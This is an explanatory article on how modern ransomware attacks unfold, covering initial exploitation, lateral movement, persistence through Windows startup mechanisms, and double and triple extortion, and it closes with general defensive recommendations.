Ransomware attacks were once thought to follow a four-step pattern: exploit vulnerabilities, move laterally through a system, encrypt data, and demand payment. Recent research, however, has shown that hackers are going a step further: once they gain unauthorized access to a system, they leverage vulnerable legitimate infrastructure to maintain continuous access, using legitimate remote management tools that blend seamlessly into normal operations. Because they conduct continual vulnerability scanning, waiting for hacking to be confirmed is no longer a safe option. Current organizations must combine vulnerability management with cutting-edge cyber threat intelligence to identify and center their efforts on their specific risks. 24/7 monitoring is also key; a strong security operations center (SOC) can detect subtle changes and take immediate action to stop threats in their tracks.
Initial System and Network Vulnerability Exploitation
Attackers first gain unauthorized access to systems and software by targeting exposed services or relying on phishing schemes. A common entry point is unpatched operating systems and software vulnerabilities. Software vendors regularly release updates to address security flaws, but organizations sometimes delay or skip them, leaving their systems exposed. Attackers scan networks for these vulnerabilities, use exploit code to gain remote access, and then execute malicious code. Exposed remote access services, such as remote desktop protocol (RDP) and virtual private networks (VPNs), are another concern, as they can be easily exploited if security wanes. Attackers commonly use stolen credentials or brute-force attacks to log in. If multifactor authentication isn’t enabled, they can obtain usernames and passwords and operate undetected. If network resources are improperly secured, ports are left open, or cloud services are misconfigured, attackers can easily exploit these weaknesses. These vulnerabilities underscore the importance of protecting one’s organization through endpoint security, identity and access controls, ongoing vulnerability management, managed detection and response, and insurance-approved incident response.
Privilege Escalation and Lateral Movement
The next step for attackers is to exploit vulnerabilities to obtain higher-level permissions. For instance, they may exploit application flaws to gain administrative privileges and unrestricted access to key systems. Once they have the credentials and privileges they are after, they can start moving laterally, moving from one system to another within a network, accessing resources, and preparing for their endgame. They can also discover the countermeasures security teams typically use to respond to an attack and leverage legitimate RDP and other tools to blend in with normal operations and evade detection.
Maintaining Persistence and Evading Detection
Once ransomware attackers gain entry, their aim is to maintain their foothold within a system—a goal they typically achieve by installing backdoor malware that persists to remain active even after a reboot. There are many ways they run malicious code every time Windows starts, including startup folders, Run and RunOnce registry keys, and scheduled tasks. For instance, in the case of startup folders, attackers can exploit folders whose contents run automatically at login. Typically, Microsoft Teams starts automatically. Hackers can ensure their hidden ransomware loader starts automatically as well. With Run and RunOnce registry keys, there are specific keys that run automatically at startup if malware adds itself to them. Finally, for scheduled tasks, Windows has the Task Scheduler, which runs programs automatically when specific conditions are met (or at specific times). Attackers can ensure that malicious tasks are added to this list.
Data Encryption, Exfiltration, and Extortion
Instead of relying exclusively on ransomware’s typical method of encrypting files and demanding payment to decrypt, many are using more sophisticated tactics, such as exfiltration and extortion. In many recent ransomware cases, attackers have exfiltrated data to apply pressure and extort payment from victims by threatening their reputations or legal consequences. This process is known as double extortion. Recently, attackers have added a new layer of pressure in a process known as “triple extortion.” Here, they target individual victims of data exfiltration, such as clients, employees, or vendors. Through these actions, they demonstrate that the financial and reputation damage from ransomware could extend well beyond corporate boundaries. Some of the most sophisticated attacks additionally include tactics such as DDoS attacks, social engineering, and public shaming via specific leak sites.
Ransomware attacks have become increasingly sophisticated, with many attackers threatening organizations by exfiltrating data. Companies wishing to prevent attacks need to invest in a robust cybersecurity strategy. Endpoint security, identity and access controls, ongoing vulnerability management, managed detection and response, and insurance-approved incident response can all help organizations keep their data and that of their clients and stakeholders safe from future threats.